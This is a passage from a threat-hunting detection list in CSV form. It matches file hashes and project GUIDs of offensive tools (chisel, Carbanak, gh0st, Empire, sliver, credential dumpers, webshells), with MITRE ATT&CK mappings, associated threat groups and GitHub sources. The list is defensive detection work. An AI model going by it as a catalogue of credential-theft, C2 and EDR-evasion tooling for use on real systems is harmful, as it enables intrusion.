Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20723" "*0164dc11b05124166f83da841b2cefbf91a8a1ee105820b416d9493263ebd222*",".{0,1000}0164dc11b05124166f83da841b2cefbf91a8a1ee105820b416d9493263ebd222.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 
- T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#filehash","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","20725" "*01723b5e0bb24057800417322796141865b8a5883c079ccd78dc0ffa9a3c496e*",".{0,1000}01723b5e0bb24057800417322796141865b8a5883c079ccd78dc0ffa9a3c496e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20728" "*017c2b90e43274da40ed0346587b5a2d02af576b305b882eb31806eb7509655c*",".{0,1000}017c2b90e43274da40ed0346587b5a2d02af576b305b882eb31806eb7509655c.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","#filehash","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","20730" "*01825b6b38ccd13900a4b83d2fb63f5246c775d05c032dc2d57c84c5b9940839*",".{0,1000}01825b6b38ccd13900a4b83d2fb63f5246c775d05c032dc2d57c84c5b9940839.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","20733" "*0186e7cb9cdc480d638db0c7c7ec42ce4b538e930a416b889cc3aed7d3938bbe*",".{0,1000}0186e7cb9cdc480d638db0c7c7ec42ce4b538e930a416b889cc3aed7d3938bbe.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20736" 
"*01871B2B-B006-4069-997D-BAB3EB216160*",".{0,1000}01871B2B\-B006\-4069\-997D\-BAB3EB216160.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","20737" "*01883999ea47a8fba7b188d36915d6514cf6299692684547f7b9820310bc5f72*",".{0,1000}01883999ea47a8fba7b188d36915d6514cf6299692684547f7b9820310bc5f72.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","20738" "*018a8c1acc14adf544c2d05b066556e7b67e3756e30e928a4ff79cde74229086*",".{0,1000}018a8c1acc14adf544c2d05b066556e7b67e3756e30e928a4ff79cde74229086.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","20739" "*018BD6D4-9019-42FD-8D3A-831B23B47CB2*",".{0,1000}018BD6D4\-9019\-42FD\-8D3A\-831B23B47CB2.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with 
SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","0","#GUIDproject","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","20740" "*018bdc303d4d1d7ef36e50f7967e3adfc9e613dd51cda3865af30893bfcf5ea5*",".{0,1000}018bdc303d4d1d7ef36e50f7967e3adfc9e613dd51cda3865af30893bfcf5ea5.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","20741" "*018cedf55d51bc510037225619f98f49b5138d842f3d375e1cd880bb102e047e*",".{0,1000}018cedf55d51bc510037225619f98f49b5138d842f3d375e1cd880bb102e047e.{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","0","#filehash","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","20742" "*019b542ddfc430bd0657e148450bec8b108b0d00686f961b5a6aab5db554fa82*",".{0,1000}019b542ddfc430bd0657e148450bec8b108b0d00686f961b5a6aab5db554fa82.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","20743" "*01a01a483466244ce6e6cfd3d03bdc40add8fa92ee435fefef1c4bb93fabd70c*",".{0,1000}01a01a483466244ce6e6cfd3d03bdc40add8fa92ee435fefef1c4bb93fabd70c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","20744" "*01a82d6612d5698da1badc96841f2d6835e26ee95af3c536411b6d1b086da811*",".{0,1000}01a82d6612d5698da1badc96841f2d6835e26ee95af3c536411b6d1b086da811.{0,1000}","offensive_tool_keyword","1.6-C2","Using the Counter Strike 1.6 RCON protocol as a C2 Channel","T1071 - T1095 - T1572","TA0011 - TA0010","N/A","N/A","C2","https://github.com/eversinc33/1.6-C2","1","0","#filehash","N/A","6","10","78","5","2025-02-19T15:34:37Z","2024-01-23T18:30:00Z","20746" "*01ac77412cfd1be301554bc8db9e5f499337ff1ee631f1ed43a3454d60d25a48*",".{0,1000}01ac77412cfd1be301554bc8db9e5f499337ff1ee631f1ed43a3454d60d25a48.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20747" "*01ae8b32692998eefc9b050e189672ebbc6e356355fc5777957830fd8a067028*",".{0,1000}01ae8b32692998eefc9b050e189672ebbc6e356355fc5777957830fd8a067028.{0,1000}","offensive_tool_keyword","Spyndicapped","COM ViewLogger - keylogger","T1574.001 - T1574.002 - T1574.009","TA0006","N/A","N/A","Credential Access","https://github.com/CICADA8-Research/Spyndicapped","1","0","#filehash","N/A","10","4","356","50","2025-01-06T07:31:29Z","2024-12-25T11:47:39Z","20748" "*01b0e8b416acdd571719f15ae31beaa7ca2f363c3d674f4ba03261fd3d33fb3d*",".{0,1000}01b0e8b416acdd571719f15ae31beaa7ca2f363c3d674f4ba03261fd3d33fb3d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20750" "*01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b*",".{0,1000}01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation 
tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","20753" "*01C142BA-7AF1-48D6-B185-81147A2F7DB7*",".{0,1000}01C142BA\-7AF1\-48D6\-B185\-81147A2F7DB7.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","#GUIDproject","N/A","9","8","761","129","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z","20754" "*01c5865909e4e7737cc57397388405fcca18139b3da6845ecef11abbd89f4615*",".{0,1000}01c5865909e4e7737cc57397388405fcca18139b3da6845ecef11abbd89f4615.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","20755" "*01c79370958be0cd2c8c9dddd793556e37d0edf80f9ffd1f368c5440e5ef9666*",".{0,1000}01c79370958be0cd2c8c9dddd793556e37d0edf80f9ffd1f368c5440e5ef9666.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. 
It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","0","#filehash","N/A","5","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","20756" "*01c856cd200bc91b6c8c6e7e11de385b34da4fb2789a497279910238e8dbe70a*",".{0,1000}01c856cd200bc91b6c8c6e7e11de385b34da4fb2789a497279910238e8dbe70a.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","20757" "*01c8974109c2a3e134f3dfbdd01e0cb277b41d9aee313f33ddec6bb6157e8f84*",".{0,1000}01c8974109c2a3e134f3dfbdd01e0cb277b41d9aee313f33ddec6bb6157e8f84.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20758" "*01ccc2ba607a0aa44e7bd6690dc5d93001ad70b03ad817142f7f9abb4c911abb*",".{0,1000}01ccc2ba607a0aa44e7bd6690dc5d93001ad70b03ad817142f7f9abb4c911abb.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20759" "*01cf2c956d813b4dddcde5f3349ada814764aa45d9579e8dde063c891f62d1d4*",".{0,1000}01cf2c956d813b4dddcde5f3349ada814764aa45d9579e8dde063c891f62d1d4.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","20760" "*01d38f94612e1b04e52b08c8ab75d8c614a5e9a716b01754ef4884a06e9669c3*",".{0,1000}01d38f94612e1b04e52b08c8ab75d8c614a5e9a716b01754ef4884a06e9669c3.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","0","#filehash","N/A","8","1","0","1","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z","20761" "*01dc5af0ad49e564af57a8debc4b3c354fdcd3f85b36e9f5b5511bd674b98dce*",".{0,1000}01dc5af0ad49e564af57a8debc4b3c354fdcd3f85b36e9f5b5511bd674b98dce.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20765" "*01e17d1133dbcf9e6acd463f20f6a5b8a499f5ec8d728cdfea8c58df1085d1cc*",".{0,1000}01e17d1133dbcf9e6acd463f20f6a5b8a499f5ec8d728cdfea8c58df1085d1cc.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - 
T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","20766" "*01eaa83c281f96c0669d3b898bb6ea2a89d00191eed047bd7db9527115ad1290*",".{0,1000}01eaa83c281f96c0669d3b898bb6ea2a89d00191eed047bd7db9527115ad1290.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20767" "*01feeebb7db49be46eb416caf2975ff62e79061c77e20430fb0d2df578b307c1*",".{0,1000}01feeebb7db49be46eb416caf2975ff62e79061c77e20430fb0d2df578b307c1.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","20769" "*02024fe8246f659fb6dd07eaf93379e8a8011420d10b83e6bb422b66e53c4292*",".{0,1000}02024fe8246f659fb6dd07eaf93379e8a8011420d10b83e6bb422b66e53c4292.{0,1000}","offensive_tool_keyword","Okta-Password-Sprayer","This script is a multi-threaded Okta password sprayer.","T1110 - T1110.003 - T1621","TA0006","N/A","N/A","Credential Access","https://github.com/Rhynorater/Okta-Password-Sprayer","1","0","#filehash","N/A","10","1","70","16","2024-01-05T16:24:38Z","2018-09-24T23:39:16Z","20771" "*0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092*",".{0,1000}0202f72b3e8b62e5ebc99164c7d4eb8ec5be6a7527286e9059184aa8321e0092.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - 
TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20772" "*0207936279f3e40608ea72aae76312c3e5485f6eabd041d5c690f485c523a795*",".{0,1000}0207936279f3e40608ea72aae76312c3e5485f6eabd041d5c690f485c523a795.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","20774" "*02091a63c2130e04b47ea5947c12d3c850616d21da8d628f0ae91e2cf43f7f4b*",".{0,1000}02091a63c2130e04b47ea5947c12d3c850616d21da8d628f0ae91e2cf43f7f4b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# 
offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20775" "*020e1dde294fabdc174cfec3d2405f70d462a897241582d16aff6670230acc45*",".{0,1000}020e1dde294fabdc174cfec3d2405f70d462a897241582d16aff6670230acc45.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20776" "*0212bde3715a349a6b684dd54548638b5899be8d62a1e25559937e494e3cce54*",".{0,1000}0212bde3715a349a6b684dd54548638b5899be8d62a1e25559937e494e3cce54.{0,1000}","offensive_tool_keyword","JuicyPotato","Windows Local Privilege Escalation from Service Account to System","T1055.012 - T1068 - T1548.002 - T1505.003","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/uknowsec/JuicyPotato","1","0","#filehash","N/A","10","2","190","46","2021-07-01T05:28:41Z","2021-06-10T12:06:13Z","20778" "*02151e34b45cec985c68b52bc6dcbd2014116d22e92408e19e471e7fdb37baf6*",".{0,1000}02151e34b45cec985c68b52bc6dcbd2014116d22e92408e19e471e7fdb37baf6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - 
T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","20779" "*021ae50ec89266dabb1f96f703ec04dad908eef0e63d12c1ed38a40833198f79*",".{0,1000}021ae50ec89266dabb1f96f703ec04dad908eef0e63d12c1ed38a40833198f79.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","#filehash","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","20780" "*022781a00ae035eba4657733106f9d6909ec28f4bcd77b19a0ee215cb7766d85*",".{0,1000}022781a00ae035eba4657733106f9d6909ec28f4bcd77b19a0ee215cb7766d85.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","20782" "*0228336A-2F4C-0D17-2E11-86654A1FAD8D*",".{0,1000}0228336A\-2F4C\-0D17\-2E11\-86654A1FAD8D.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - 
TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","0","#GUIDProject","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","20783" "*022E5A85-D732-4C5D-8CAD-A367139068D8*",".{0,1000}022E5A85\-D732\-4C5D\-8CAD\-A367139068D8.{0,1000}","offensive_tool_keyword","Krueger","remotely killing EDR with WDAC","T1562.001 - T1562.004 - T1218.011 - T1548.002 - T1027","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/logangoins/Krueger","1","0","#GUIDproject","N/A","9","4","353","42","2025-01-06T06:57:14Z","2024-11-15T20:11:01Z","20784" "*022f86896e1a525969c4f067a241fce1e6435084d5cef6bc048adfdedc9df1de*",".{0,1000}022f86896e1a525969c4f067a241fce1e6435084d5cef6bc048adfdedc9df1de.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","20785" "*0235a4141278cb9aa45413f9ed58f0c20ae38dbae48b8440a1b96e4544e6857f*",".{0,1000}0235a4141278cb9aa45413f9ed58f0c20ae38dbae48b8440a1b96e4544e6857f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20786" "*023B2DB0-6DA4-4F0D-988B-4D9BF522DA37*",".{0,1000}023B2DB0\-6DA4\-4F0D\-988B\-4D9BF522DA37.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. 
Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#GUIDproject","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","20788" "*023fbd9f1d087ec3cb0761e01d95503f055e72209f85513380ed1b32177ef570*",".{0,1000}023fbd9f1d087ec3cb0761e01d95503f055e72209f85513380ed1b32177ef570.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","20789" "*02456d3ccf24f0b89c47b9c9c406799462b7ca4b8405fca8f340a61ee275b7e6*",".{0,1000}02456d3ccf24f0b89c47b9c9c406799462b7ca4b8405fca8f340a61ee275b7e6.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","20790" "*024c613cc354982252fc7e6e16cf1b0077bd005dd7eca9ec6ad489fadac1ac28*",".{0,1000}024c613cc354982252fc7e6e16cf1b0077bd005dd7eca9ec6ad489fadac1ac28.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
